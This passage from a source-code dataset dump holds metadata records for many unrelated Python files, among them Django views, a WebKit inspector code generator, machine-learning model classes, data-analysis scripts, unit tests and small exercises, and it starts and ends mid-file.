L[1] - d])\n d = 0\n ans = 0\n for c in cut:\n ans += c**2\n print(ans)\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Mao-beta/AtCoder","sub_path":"PAST/PAST02G.py","file_name":"PAST02G.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27178068633","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Max\n\nfrom flow.models import Node\nfrom .forms import DrawingForm\nfrom .models import DrawingNode, DrawingNodeFlowRel\n\n\n# Create your views here.\n@login_required\ndef ajax_upload_drawing(request, node_id):\n ret = {'code': 'fail'}\n try:\n node = Node.objects.get(pk=node_id)\n except Node.DoesNotExist:\n ret['msg'] = \"node cant find\"\n return JsonResponse(ret)\n if request.method == \"POST\":\n drawing = DrawingForm(request.POST, request.FILES)\n print(request.FILES.get('location'))\n print(request.POST)\n if drawing.is_valid():\n drawing = drawing.save(commit=False)\n id_name = drawing.location.name.split('/')[-1].split('_')[0]\n dn, created = DrawingNode.objects.get_or_create(name=id_name)\n if created:\n dn.author = request.user\n DrawingNodeFlowRel.objects.create(\n flow=node.flow, drawing_node=dn)\n dn.save()\n drawing.drawing_node = dn\n drawing.author = request.user\n qs = drawing.drawing_node.drawing_set.aggregate(Max('order'))\n drawing.order = (qs['order__max'] or 0) + 1\n drawing.save()\n ret['code'] = 'success'\n return JsonResponse(ret)\n else:\n print(drawing.errors)\n ret['msg'] = \"form not validate\"\n else:\n ret['msg'] = 'invalid request method'\n return JsonResponse(ret)\n","repo_name":"NullOnSpace/ReynoldsFlow","sub_path":"drawing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22877140702","text":"# -*- coding: utf-8 -*-\n\"\"\"bigas URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom __future__ import unicode_literals\nfrom django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import HomePageView, FormHorizontalView, FormInlineView, PaginationView, FormWithFilesView, \\\n DefaultFormView, MiscView, DefaultFormsetView, DefaultFormByFieldView\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', HomePageView.as_view(), name='home'),\n url(r'^formset$', DefaultFormsetView.as_view(), name='formset_default'),\n url(r'^form$', DefaultFormView.as_view(), name='form_default'),\n url(r'^form_by_field$', DefaultFormByFieldView.as_view(), name='form_by_field'),\n url(r'^form_horizontal$', FormHorizontalView.as_view(), name='form_horizontal'),\n url(r'^form_inline$', FormInlineView.as_view(), name='form_inline'),\n url(r'^form_with_files$', FormWithFilesView.as_view(), name='form_with_files'),\n url(r'^pagination$', PaginationView.as_view(), name='pagination'),\n url(r'^misc$', MiscView.as_view(), name='misc'),\n]\n","repo_name":"danielrcardenas/assigment_rooms","sub_path":"bigas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20642818629","text":"#coding=utf-8\n\nimport hashlib\n\n\n\ndef genearteMD5(str):\n # 创建md5对象\n hl = hashlib.md5()\n\n # Tips\n # 此处必须声明encode\n # 否则报错为:hl.update(str) Unicode-objects must be encoded before hashing\n hl.update(str.encode(encoding='utf-8'))\n strmd5=hl.hexdigest()\n print('MD5加密前为 :' + str)\n print('MD5加密后为 :' + strmd5)\n\n return strmd5\n\nif __name__==\"__main__\":\n genearteMD5(\"\")","repo_name":"zhuzhilin3/test","sub_path":"ET_test/commons/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7204151443","text":"import ipywidgets as widgets\nfrom ipywidgets import Layout\n\nfrom ..._version import VERSION\nfrom .core import IPyDisplayMixin, RegisteredWidget\n\n__version__ = VERSION\n__author__ = \"Ian Hellen\"\n\n\nclass GetText(RegisteredWidget, IPyDisplayMixin):\n \"\"\"\n GetEnvironmentKey.\n\n Tries to retrieve an environment variable value. The value\n can be changed/set and optionally saved back to the system\n environment.\n \"\"\"\n\n def __init__(\n self,\n default: str = None,\n description: str = \"Enter the value: \",\n auto_display: bool = False,\n **kwargs,\n ):\n \"\"\"\n Create a new instance of GetEnvironmentKey.\n\n Parameters\n ----------\n default : str\n Default value.\n description : str, optional\n Prompt to display with the text box.\n (the default is \"Enter the value: \")\n \"prompt\" is a alias for this parameter\n auto_display : bool, optional\n Whether to display on instantiation (the default is False)\n\n See Also\n --------\n RegisteredWidget\n\n \"\"\"\n self._value = default\n description = kwargs.pop(\"prompt\", description)\n\n # Call superclass to register\n super().__init__(id_vals=[default, description], val_attrs=[\"_value\"], **kwargs)\n\n self._w_text = widgets.Text(\n value=self._value,\n description=description,\n layout=Layout(width=\"50%\"),\n style={\"description_width\": \"initial\"},\n )\n\n self._w_text.observe(self._update_value, names=\"value\")\n if auto_display:\n self.display()\n\n def _update_value(self, change):\n self._value = change.get(\"new\", \"\")\n\n @property\n def layout(self):\n \"\"\"Return underlying widget collection.\"\"\"\n return self._w_text\n\n @property\n def value(self):\n \"\"\"Get the current value of the key.\"\"\"\n return self._value.strip() if self._value else None\n\n def display(self):\n \"\"\"Display the interactive widgets.\"\"\"\n if self._value:\n self._w_text.value = self._value\n super().display()\n","repo_name":"pianomanx/msticpy","sub_path":"msticpy/nbtools/nbwidgets/get_text.py","file_name":"get_text.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"11101256822","text":"import retro\nimport cv2\nimport numpy as np\nimport pickle\nimport neat\n\nenv = retro.make(game=\"MortalKombat3-Genesis\", state=\"sub-zero-hard1\", record='.')\n# env = retro.make(game=\"MortalKombat3-Genesis\")\n\nw = pickle.load(open(\"sub-zero-winner6.bin\", \"rb\"))\nob = env.reset()\ninx, iny, inc = env.observation_space.shape\ninx = int(inx/8)\niny = int(iny/8)\nimageArray = []\nframe = 0\ndone = False\nconfig = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n 'config-neat')\nnet = neat.nn.recurrent.RecurrentNetwork.create(w,config)\nwhile not done:\n if (frame >= 5):\n # env.render()\n frame = 0\n frame += 1\n ob = cv2.resize(ob, (inx, iny))\n ob = cv2.cvtColor(ob, cv2.COLOR_BGR2GRAY)\n ob = np.reshape(ob, (inx, iny))\n\n # for x in ob:\n # for y in x:\n # imageArray.append(y)\n imageArray = ob.flatten()\n nnOut = net.activate(imageArray)\n\n ob, reword, done, info = env.step(nnOut)\n","repo_name":"Veljko97/ORI-2019-NEAT-MortalKombat3","sub_path":"playGame/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"11207667676","text":"import logging\nimport string\nfrom string import Template\n\ntry:\n from .cpp_generator import CppGenerator\n from .cpp_generator_templates import CppGeneratorTemplates as CppTemplates\n from .generator import Generator, ucfirst\n from .models import ObjectType, ArrayType, AliasedType, EnumType\nexcept:\n from cpp_generator import CppGenerator\n from cpp_generator_templates import CppGeneratorTemplates as CppTemplates\n from generator import Generator, ucfirst\n from models import ObjectType, ArrayType, AliasedType, EnumType\n\nlog = logging.getLogger('global')\n\n\nclass CppFrontendDispatcherImplementationGenerator(CppGenerator):\n def __init__(self, *args, **kwargs):\n CppGenerator.__init__(self, *args, **kwargs)\n\n def output_filename(self):\n return \"%sFrontendDispatchers.cpp\" % self.protocol_name()\n\n def domains_to_generate(self):\n return [domain for domain in Generator.domains_to_generate(self) if len(self.events_for_domain(domain)) > 0]\n\n def generate_output(self):\n header_args = {\n 'primaryInclude': '\"%sFrontendDispatchers.h\"' % self.protocol_name(),\n 'secondaryIncludes': self._generate_secondary_header_includes(),\n }\n\n sections = []\n sections.append(self.generate_license())\n sections.append(Template(CppTemplates.ImplementationPrelude).substitute(None, **header_args))\n sections.extend(list(map(self._generate_dispatcher_implementations_for_domain, self.domains_to_generate())))\n sections.append(Template(CppTemplates.ImplementationPostlude).substitute(None, **header_args))\n return \"\\n\\n\".join(sections)\n\n # Private methods.\n\n def _generate_secondary_header_includes(self):\n header_includes = [\n ([\"JavaScriptCore\", \"WebKit\"], (\"JavaScriptCore\", \"inspector/InspectorFrontendRouter.h\")),\n ]\n return '\\n'.join(self.generate_includes_from_entries(header_includes))\n\n def _generate_dispatcher_implementations_for_domain(self, domain):\n implementations = []\n events = self.events_for_domain(domain)\n for event in events:\n implementations.append(self._generate_dispatcher_implementation_for_event(event, domain))\n\n return self.wrap_with_guard_for_condition(domain.condition, '\\n\\n'.join(implementations))\n\n def _generate_dispatcher_implementation_for_event(self, event, domain):\n lines = []\n parameter_assignments = []\n formal_parameters = []\n\n for parameter in event.event_parameters:\n parameter_name = parameter.parameter_name\n if parameter.is_optional:\n parameter_name = 'opt_' + parameter_name\n\n parameter_value = parameter_name\n\n _type = parameter.type\n if isinstance(_type, AliasedType):\n _type = _type.aliased_type\n if isinstance(_type, EnumType) and _type.is_anonymous:\n _type = _type.primitive_type\n\n if _type.is_enum():\n if parameter.is_optional:\n parameter_value = '*' + parameter_value\n parameter_value = 'Protocol::%s::getEnumConstantValue(%s)' % (self.helpers_namespace(), parameter_value)\n elif CppGenerator.should_release_argument(_type, parameter.is_optional):\n parameter_value = parameter_value + '.releaseNonNull()'\n elif CppGenerator.should_dereference_argument(_type, parameter.is_optional):\n parameter_value = '*' + parameter_value\n elif CppGenerator.should_move_argument(_type, parameter.is_optional):\n parameter_value = 'WTFMove(%s)' % parameter_value\n\n parameter_args = {\n 'parameterKey': parameter.parameter_name,\n 'parameterName': parameter_name,\n 'parameterValue': parameter_value,\n 'keyedSetMethod': CppGenerator.cpp_setter_method_for_type(_type),\n }\n\n if parameter.is_optional:\n parameter_assignments.append(' if (!!%(parameterName)s)' % parameter_args)\n parameter_assignments.append(' protocol_paramsObject->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % parameter_args)\n else:\n parameter_assignments.append(' protocol_paramsObject->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % parameter_args)\n\n formal_parameters.append('%s %s' % (CppGenerator.cpp_type_for_event_parameter(_type, parameter.is_optional), parameter_name))\n\n event_args = {\n 'domainName': domain.domain_name,\n 'eventName': event.event_name,\n 'formalParameters': \", \".join(formal_parameters)\n }\n\n lines.append('void %(domainName)sFrontendDispatcher::%(eventName)s(%(formalParameters)s)' % event_args)\n lines.append('{')\n lines.append(' auto protocol_jsonMessage = JSON::Object::create();')\n lines.append(' protocol_jsonMessage->setString(\"method\"_s, \"%(domainName)s.%(eventName)s\"_s);' % event_args)\n\n if len(parameter_assignments) > 0:\n lines.append(' auto protocol_paramsObject = JSON::Object::create();')\n lines.extend(parameter_assignments)\n lines.append(' protocol_jsonMessage->setObject(\"params\"_s, WTFMove(protocol_paramsObject));')\n\n lines.append('')\n lines.append(' m_frontendRouter.sendEvent(protocol_jsonMessage->toJSONString());')\n lines.append('}')\n return self.wrap_with_guard_for_condition(event.condition, \"\\n\".join(lines))\n","repo_name":"WebKit/WebKit","sub_path":"Source/JavaScriptCore/inspector/scripts/codegen/generate_cpp_frontend_dispatcher_implementation.py","file_name":"generate_cpp_frontend_dispatcher_implementation.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"} +{"seq_id":"22379541729","text":"# Katie Li\n# 06/09/2015\n# example use: python3 simple_analysis.py data.csv Testing Time\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom textwrap import wrap\nimport sys\n\nfilename = input(\"data file to read from:\" ) \nDEFAULT_HEADER =60\ndf = pd.read_csv(filename, header=DEFAULT_HEADER, delim_whitespace=False)\n\nf = lambda u: int(str(u)[4:-2]) \nf2 = lambda u: int(str(u)[:-4])\ndf['month'] = df['Date'].map(f) \ndf['year'] = df['Date'].map(f2) \ndf['copy_month'] = df['month']\ndf['copy_year'] = df['year']\n## get rid of missing data for specified variable\n\ndef analyzeOneVariable(df, timeFrame, variable):\n df2 = df[['Date', variable,timeFrame, 'copy_' + timeFrame]].dropna()\n df2 = df2.groupby(timeFrame).mean()\n df2['std_'+ variable] = df2[variable].std() \n df2[variable+ \"_Ustd\"] = df2[variable] + df2['std_'+ variable] \n df2[variable+ \"_Dstd\"] = df2[variable] - df2['std_'+ variable] \n return df2\n\n## create simple, minimalistic plot\ndef createPlot(timeFrame, plotTitle, variable, units, df2):\n plt.cla()\n plt.title(\"\\n\".join(wrap(\" Mean for each \" + timeFrame + \" , \"+ plotTitle + \\\n \" 1989 - 2015, Pomona California\", 50)))\n plt.xlabel('Time '+ timeFrame, fontsize=12, color='black')\n plt.ylabel(plotTitle+ \" \" + units, fontsize = 12, color='black')\n plt.plot(df2['copy_' + timeFrame], df2[variable], color=\"#078ccc\", marker='o')\n plt.plot(df2['copy_' + timeFrame], df2[variable +\"_Ustd\"], color=\"#000000\")\n plt.plot(df2['copy_' + timeFrame], df2[variable + \"_Dstd\"], color=\"#000000\")\n print(df2[[str('copy_'+ timeFrame),variable]])\n print(df2.index)\n plt.savefig('graphs/'+ plotTitle+ timeFrame + \".png\")\n plt.cla()\n\nif __name__ == '__main__': \n df2 = analyzeOneVariable(df, \"month\", \"Precip\")\n createPlot(\"month\", \"Precipitation\", \"Precip\", \"\", df2) \n df2.to_csv(\"csv/MonthlyPrecip.csv\", encoding='utf-8')\n\n df2 = analyzeOneVariable(df, \"year\", \"Precip\")\n createPlot(\"year\", \"Precipitation\", \"Precip\", \"(inches)\", df2) \n df2.to_csv(\"csv/YearlyPrecip.csv\", encoding='utf-8')\n\n df2 = analyzeOneVariable(df, \"year\", \"Air_max\")\n createPlot(\"year\", \"Maximum temperature\", \"Air_max\", \"(F)\", df2) \n df2.to_csv(\"csv/MaxYearlyTemp.csv\", encoding='utf-8')\n\n df2 = analyzeOneVariable(df, \"month\", \"Air_max\")\n createPlot(\"month\", \"Maximum temperature\", \"Air_max\", \"(F)\", df2) \n df2.to_csv(\"csv/MaxMonthlyTemp.csv\", encoding='utf-8')\n\n\n\n print(\"Done\")\n","repo_name":"ksl0/BMP","sub_path":"simple_analysis.py","file_name":"simple_analysis.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14290808655","text":"from os import path\n\nfrom golem.environments.minperformancemultiplier import MinPerformanceMultiplier\nfrom golem.testutils import DatabaseFixture\n\nfrom golem.environments.environment import Environment\nfrom golem.model import Performance\nfrom golem.testutils import PEP8MixIn\n\n\nclass EnvTest(DatabaseFixture, PEP8MixIn):\n PEP8_FILES = [\"golem/environments/environment.py\"]\n\n def setUp(self):\n super().setUp()\n self.env = Environment()\n\n def test_get_performance(self):\n # given\n perf_value = 6666.6\n perf = Performance(environment_id=Environment.get_id(),\n value=perf_value)\n perf.save()\n\n # then\n self.assertEqual(self.env.get_performance(), perf_value)\n\n def test_get_source_code(self):\n # check defaults\n assert self.env.get_source_code() is None\n\n # given\n file_name = path.join(self.path, \"mainprogramfile\")\n self.env.main_program_file = file_name\n\n # then\n assert self.env.get_source_code() is None\n\n # re-given\n with open(file_name, 'w') as f:\n f.write(\"PROGRAM CODE\")\n\n # then\n self.env.main_program_file = file_name\n assert self.env.get_source_code() == \"PROGRAM CODE\"\n\n def test_check_software(self):\n # check defaults\n assert not self.env.check_software()\n self.env.allow_custom_main_program_file = True\n assert self.env.check_software()\n\n # given\n self.env.allow_custom_main_program_file = False\n file_name = path.join(self.path, \"mainprogramfile\")\n self.env.main_program_file = file_name\n\n with open(file_name, 'w') as f:\n f.write(\"PROGRAM CODE\")\n\n # then\n assert self.env.check_software()\n\n def test_run_default_benchmark(self):\n assert Environment.get_performance() == 0.0\n assert Environment.run_default_benchmark(save=True) > 0.0\n assert Environment.get_performance() > 0.0\n\n def test_get_min_accepted_performance_default(self):\n self.assertEqual(MinPerformanceMultiplier.get(), 0.0)\n self.assertEqual(self.env.get_min_accepted_performance(), 0.0)\n\n def test_get_min_accepted_performance(self):\n # given\n p = Performance(environment_id=Environment.get_id(),\n min_accepted_step=100)\n p.save()\n MinPerformanceMultiplier.set(3.141)\n\n # then\n self.assertEqual(MinPerformanceMultiplier.get(), 3.141)\n self.assertEqual(self.env.get_min_accepted_performance(), 314.1)\n","repo_name":"albert19882016/golem","sub_path":"tests/golem/environments/test_environment.py","file_name":"test_environment.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"12739886375","text":"import numpy as np\nimport logging\nfrom supervised.models.learner import Learner\nfrom sklearn.externals import joblib\nimport copy\n\nlogger = logging.getLogger(__name__)\n\n\nclass SklearnLearner(Learner):\n def __init__(self, params):\n super(SklearnLearner, self).__init__(params)\n\n def fit(self, X, y):\n self.model.fit(X, y)\n\n def copy(self):\n return copy.deepcopy(self)\n\n def save(self):\n joblib.dump(self.model, self.model_file_path, compress=True)\n\n json_desc = {\n \"library_version\": self.library_version,\n \"algorithm_name\": self.algorithm_name,\n \"algorithm_short_name\": self.algorithm_short_name,\n \"uid\": self.uid,\n \"model_file\": self.model_file,\n \"model_file_path\": self.model_file_path,\n \"params\": self.params,\n }\n\n logger.debug(\"SklearnLearner save to {0}\".format(self.model_file_path))\n return json_desc\n\n def load(self, json_desc):\n self.library_version = json_desc.get(\"library_version\", self.library_version)\n self.algorithm_name = json_desc.get(\"algorithm_name\", self.algorithm_name)\n self.algorithm_short_name = json_desc.get(\n \"algorithm_short_name\", self.algorithm_short_name\n )\n self.uid = json_desc.get(\"uid\", self.uid)\n self.model_file = json_desc.get(\"model_file\", self.model_file)\n self.model_file_path = json_desc.get(\"model_file_path\", self.model_file_path)\n self.params = json_desc.get(\"params\", self.params)\n\n self.model = joblib.load(self.model_file_path)\n\n logger.debug(\n \"SklearnLearner loading model from {0}\".format(self.model_file_path)\n )\n\n\nclass SklearnTreesClassifierLearner(SklearnLearner):\n def __init__(self, params):\n super(SklearnTreesClassifierLearner, self).__init__(params)\n\n def fit(self, X, y):\n self.model.fit(X, np.ravel(y))\n self.model.n_estimators += self.trees_in_step\n\n def predict(self, X):\n return self.model.predict_proba(X)[:, 1]\n","repo_name":"sarikayamehmet/mljar-supervised","sub_path":"supervised/models/learner_sklearn.py","file_name":"learner_sklearn.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"2024077620","text":"# -*- coding: utf-8 -*-\n\"\"\"BayesianConv5Dense1 definition. Sigmoid and softplus instead of tanh for positive output. No dropout.\"\"\"\n\nimport torch.nn as nn\n\nfrom utils.layers import BayesianConv2d, BayesianLinear, Flatten\nfrom models.abstract_model import AbstractModel\n\n\nclass BayesianConv5Dense1(AbstractModel):\n\n def __init__(self, input_size):\n \"\"\"\n Parameters\n ----------\n input_size : (int, int, int)\n Input size.\n \"\"\"\n super(BayesianConv5Dense1, self).__init__(input_size)\n \n self.layers = nn.ModuleList([\n BayesianConv2d(input_size[0], 10, kernel_size=(10, 1), padding=(5, 0)),\n nn.Sigmoid(),\n BayesianConv2d(10, 10, kernel_size=(10, 1), padding=(4, 0)),\n nn.Sigmoid(),\n BayesianConv2d(10, 10, kernel_size=(10, 1), padding=(5, 0)),\n nn.Sigmoid(),\n BayesianConv2d(10, 10, kernel_size=(10, 1), padding=(4, 0)),\n nn.Sigmoid(),\n BayesianConv2d(10, 1, kernel_size=(3, 1), padding=(1, 0)),\n nn.Softplus(),\n Flatten(1 * input_size[1] * input_size[2]),\n BayesianLinear(1 * input_size[1] * input_size[2], 100),\n nn.Softplus(),\n BayesianLinear(100, 1),\n nn.Softplus()\n ])\n","repo_name":"kkangshen/bayesian-deep-rul","sub_path":"models/bayesian_conv5_dense1.py","file_name":"bayesian_conv5_dense1.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"} +{"seq_id":"40425180765","text":"fname = input('Enter the file name: ')\ntry:\n fhand = open(fname)\nexcept:\n print('File cannot be opened:', fname)\n exit()\n\nsum = 0\ncount = 0\n\nfor line in fhand:\n line = line.rstrip()\n if line.find(\"X-DSPAM-Confidence\") == -1: continue\n curr_coef = float(line[line.find(':')+1:])\n sum = sum+curr_coef\n count = count + 1\n\nprint(\"Average spam confidence is: \",sum/count)\n","repo_name":"CristianColdea/P4E","sub_path":"chapter7/ex72.py","file_name":"ex72.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12578182331","text":"# https://leetcode.com/problems/populating-next-right-pointers-in-each-node\n# 92 ms\n\n# Definition for binary tree with next pointer.\n# class TreeLinkNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n# self.next = None\n\nclass Solution:\n # @param root, a tree link node\n # @return nothing\n def connect(self, root):\n leftMost = root\n\n while leftMost:\n current = leftMost\n bridgeLeft = None\n\n while current:\n if current.left and current.right:\n current.left.next = current.right\n\n bridgeLeft = (current.right or current.left) or bridgeLeft\n current = current.next\n\n if current:\n bridgeRight = current.left or current.right\n\n if bridgeLeft and bridgeRight:\n bridgeLeft.next = bridgeRight\n\n current = leftMost\n leftMost = leftMost.left or leftMost.right\n\n while not leftMost and current:\n current = current.next\n\n if current:\n leftMost = current.left or current.right\n\n","repo_name":"diegomontoyas/Algorithms","sub_path":"LeetCode/populating-next-right-pointers-in-each-node.py","file_name":"populating-next-right-pointers-in-each-node.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25904751842","text":"import sys\r\nimport matplotlib.pyplot as plt\r\nfrom pandas import *\r\n\r\n# Define the data for the chart\r\ndata = read_csv(\"C:\\\\Users\\\\Slim5\\\\Downloads\\\\Hostel.csv\")\r\nc=float(sys.argv[1])\r\nfig, ax = plt.subplots(figsize=(3, 6))\r\nax.bar('Summary', c)\r\n\r\n# Set y-axis scale to 1 unit\r\nax.set_yticks(range(0, 11, 1))\r\n\r\nax.text(0,c,c)\r\nplt.title('Summary Score')\r\n\r\nplt.ylim(top=10)\r\n\r\nplt.savefig(\"sum.png\")\r\n","repo_name":"yashrajsingh30/Hostel","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"115310188","text":"import warnings\n\nimport pytest\n\nimport matplotlib\nfrom matplotlib.testing.decorators import image_comparison\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import EngFormatter\n\n\nwith warnings.catch_warnings():\n warnings.simplefilter('ignore')\n needs_usetex = pytest.mark.skipif(\n not matplotlib.checkdep_usetex(True),\n reason='Missing TeX of Ghostscript or dvipng')\n\n\n@needs_usetex\n@image_comparison(baseline_images=['test_usetex'],\n extensions=['pdf', 'png'],\n tol=0.3)\ndef test_usetex():\n matplotlib.rcParams['text.usetex'] = True\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.text(0.1, 0.2,\n # the \\LaTeX macro exercises character sizing and placement,\n # \\left[ ... \\right\\} draw some variable-height characters,\n # \\sqrt and \\frac draw horizontal rules, \\mathrm changes the font\n r'\\LaTeX\\ $\\left[\\int\\limits_e^{2e}'\n r'\\sqrt\\frac{\\log^3 x}{x}\\,\\mathrm{d}x \\right\\}$',\n fontsize=24)\n ax.set_xticks([])\n ax.set_yticks([])\n","repo_name":"mobiledgex/edge-cloud-qa","sub_path":"tools/cpu_generator/lib/python3.7/site-packages/matplotlib/tests/test_usetex.py","file_name":"test_usetex.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41735856361","text":"'''\n [문제]\n [조건1] 리스트에 랜덤 숫자(1~100) 다섯 개를 추가한다.\n [조건2] 위 값 중에 5의 배수들만 출력하시오.\n [예시]\n arr = [70, 87, 61, 4, 81]\n 70\n'''\nimport random\n\narr = []\n\ni = 1\n\nfor i in range(5):\n num = random.randint(1,100)\n arr.append(num)\n\nprint(arr)\n\ny = 0\ncount = 0\n\nfor y in range(len(arr)):\n if arr[y]%5==0:\n print(arr[y])\n else:\n count += 1\n\n if count == len(arr):\n print(\"해당 배열 안에서 5의 배수를 찾을 수 없습니다.\")\n","repo_name":"wisline97/keduit_frontend","sub_path":"02_python/수업자료/수업시간 내 진행/H일차배열/일차배열2_문제_랜덤/일차배열2_문제04_비교_배수_문제.py","file_name":"일차배열2_문제04_비교_배수_문제.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34711405652","text":"from logging import root\r\nfrom tkinter import DISABLED, Button,Canvas,Tk\r\nfrom turtle import bgcolor\r\nfrom PIL import Image,ImageTk\r\nfrom os import system\r\nfrom threading import Thread\r\nimport tkinter.font as font\r\nfrom playsound import playsound\r\n\r\nroot=Tk()\r\nroot.title(\"Tic Tac Toe\")\r\nroot.geometry(\"1920x1080\")\r\ncanvas1 = Canvas( root, width = 1920,height = 1080)\r\ncanvas1.pack(fill = \"both\", expand = True)\r\nimg=Image.open(\"bg.jpg\")\r\nresized_image= img.resize((1920,1080), Image.ANTIALIAS)\r\nbg=ImageTk.PhotoImage(resized_image)\r\ncanvas1.create_image( 0, 0, image = bg,anchor = \"nw\")\r\ndef run_app():\r\n canvas1.itemconfig(2,state=\"hidden\")\r\n system(\"python single.py\")\r\ndef run_app1():\r\n canvas1.itemconfig(2,state=\"hidden\")\r\n system(\"python client.py\")\r\n #one machine should have server.py in system() functin in this function to run multi player.\r\nbuttonFont = font.Font(family='Helvetica', size=12, weight='bold')\r\nsplayer = Button(root, text = \"SINGLE PLAYER\",width=30,height=3,command=Thread(target=run_app).start,font=buttonFont).place(x = 630, y = 270)\r\nmplayer = Button(root, text = \"MULTI PLAYER\",width=30,height=3,command=Thread(target=run_app1).start,font=buttonFont).place(x = 630, y = 360)\r\nroot.mainloop()","repo_name":"Tejas7102/tic-tac-toe","sub_path":"mini_project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10825058221","text":"from selenium import webdriver\nimport time\ndriver=webdriver.Firefox()\ndriver.maximize_window()\ndriver.implicitly_wait(6)\ndriver.get(\"http://trains.ctrip.com/TrainBooking/SearchTrain.aspx\")\ndriver.execute_script(\"document.getElementById('departDate').removeAttribute('readonly')\")\ndriver.find_element_by_id(\"departDate\").clear()\ndriver.find_element_by_id(\"departDate\").send_keys(\"2019-08-12\")\ntime.sleep(10)\n","repo_name":"mz237943553mz/suyaun_666","sub_path":"PycharmProjects/mz/my_list/JS日历.py","file_name":"JS日历.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37310478187","text":"import sys\nfrom enum import IntFlag\nfrom enum import auto as enum_auto\nimport numpy as np\nfrom vtkmodules.vtkCommonColor import vtkNamedColors, vtkColorSeries\nfrom vtkmodules.vtkCommonDataModel import vtkPointSet, vtkPolyData, vtkImageData, vtkExplicitStructuredGrid, vtkStructuredGrid, vtkVector3d, vtkPlanes\nfrom vtkmodules.vtkRenderingCore import (\n vtkActor,\n vtkMapper,\n vtkActorCollection,\n vtkTextActor, \n vtkProperty,\n vtkCellPicker,\n vtkPointPicker,\n vtkPolyDataMapper,\n vtkDataSetMapper,\n vtkRenderWindow,\n vtkRenderWindowInteractor,\n vtkRenderer,\n vtkColorTransferFunction,\n vtkInteractorStyle,\n vtkGlyph3DMapper,\n vtkProp,\n vtkBillboardTextActor3D,\n vtkCoordinate\n)\nfrom vtkmodules.vtkFiltersGeneral import vtkCurvatures\nfrom vtkmodules.vtkFiltersCore import vtkGlyph3D, vtkExtractEdges, vtkAppendPolyData\nfrom vtkmodules.vtkInteractionStyle import vtkInteractorStyleTrackballCamera\nfrom vtkmodules.vtkCommonCore import vtkLookupTable, vtkIdTypeArray, vtkPoints, vtkFloatArray\nfrom vtkmodules.vtkFiltersSources import vtkSphereSource\n\nfrom .polydata import *\n\n#_______________________#\n# crash without following lines\n# noinspection PyUnresolvedReferences\nimport vtkmodules.vtkInteractionStyle\n# noinspection PyUnresolvedReferences\nimport vtkmodules.vtkRenderingOpenGL2\n#_______________________#\n\n\n# from .polydata import *\n\n\nclass MOUSE(IntFlag):\n LEFT = enum_auto()\n RIGHT = enum_auto()\n MOVED = enum_auto()\n CTRL = enum_auto()\n ALT = enum_auto()\n \n # def left_down(self):\n # return (self & self.LEFT) != 